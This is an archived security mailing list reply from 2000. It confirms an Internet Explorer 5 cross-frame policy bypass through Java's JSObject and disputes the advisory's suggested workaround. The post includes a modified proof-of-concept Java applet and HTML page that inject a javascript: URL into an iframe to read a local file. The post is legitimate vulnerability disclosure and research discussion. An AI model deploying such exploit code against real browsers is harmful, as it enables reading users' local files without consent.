OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: Re: IE 5 security vulnerablity - circumventing Cross-frame security policy using Java/JavaScript (and disabling Active Scripting is not that easy)
From: TAKAGI, Hiromitsu (takagiETL.GO.JP)
Date: Thu Apr 20 2000 - 19:29:46 CDT

On Tue, 18 Apr 2000 16:20:48 +0300
Georgi Guninski <joroNAT.BG> wrote:
> Georgi Guninski security advisory #10, 2000
> IE 5 security vulnerablity - circumventing Cross-frame security policy
> using Java/JavaScript (and disabling Active Scripting is not that easy)

> Usually, IE 5.x does not allow assigning "javascript:" urls to the
> location object because this is dangerous.
> But this may be circumvented with the help of the interaction between
> Java and the DOM/JavaScript.

I confirmed the vulnerability. But I have two comments against your
report.

> Note: This is NOT a bug in the Java language, this is a bug in
> Microsoft's implementation of Java in IE.

It is not a bug in implementation of "Java". The class JSObject that
is the magic code of the vulnerability is not included in the
standard Java API and is included in the package netscape.javascript
that is an extension library provided by Netscape or Microsoft. So,
it sounds better to say, "This is NOT a bug of Java, this is a bug
in Microsoft's implementation of the extension Java package for
JavaScript".

> If you have Java enabled and Scripting of Java applets enabled, Active
                           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> Scripting may be executed.

> So, to really disable Active Scripting disable Active Scripting and
> disable Java and/or Scripting of Java applets.
                   ^^
> Workaround: Disable Java or disable Scripting of Java applets
                           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Disabling "Scripting of Java applets" seems to have no relation with the
vulnerability. Your exploit code can be refined as the following code
which does not use the function "Scripting of Java applets". This
modified version of Guninski's demo is available here.
http://java-house.etl.go.jp/~takagi/java/test/Guninski-jsinject-modified/
I confirmed that it is still vulnerable under disabling "Scripting of
Java applets".

> ------jsinject.java--------------------------------
import java.applet.Applet;
import netscape.javascript.*;
public class jsinject extends Applet {
    public void start() {
// ^^^^^^^
        try {
            JSObject win = (JSObject)JSObject.getWindow(this);
            JSObject doc = (JSObject)win.getMember("document");
            JSObject I1 = (JSObject)doc.getMember("I1");
            JSObject loc = (JSObject)I1.getMember("location");
            loc.setMember("href", getParameter("jscode"));
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
> ---------------------------------------------------

> ------jsinject.html--------------------------------
<IFRAME ID="I1" NAME="I1" SRC="file://c:/test.txt"></IFRAME>
<applet MAYSCRIPT code="jsinject">
<param name="jscode" value="javascript:alert(document.body.innerText)">
</applet>
> --------------------------------------------------- 

--
Hiromitsu Takagi
Electrotechnical Laboratory
http://www.etl.go.jp/~takagi/